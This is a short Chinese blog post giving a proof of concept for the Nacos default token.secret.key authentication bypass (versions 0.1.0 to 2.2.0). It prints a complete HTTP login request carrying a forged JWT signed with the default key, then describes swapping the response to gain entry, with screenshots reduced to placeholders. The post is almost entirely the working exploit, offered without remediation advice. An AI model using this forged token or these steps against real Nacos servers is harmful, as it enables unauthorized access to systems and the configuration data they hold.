Nacos token.secret.key 身份绕过漏洞

影响范围:

0.1.0 <= Nacos <= 2.2.0

漏洞复现:

POC:

POST /nacos/v1/auth/users/login HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OX0.00LxfkpzYpdVeojTfqMhtpPvNidpNcDoLU90MnHzA8Q

username=nacos&password=nacos

image

返回200,复制返回包,接着修改返回包,把刚刚复制的返回包复制过来放包

image

成功进入系统

image

posted @ 2024-06-28 15:29  都吃泡芙  阅读(180)  评论(0)    收藏  举报
//雪花飘落效果 //雪花飘落效果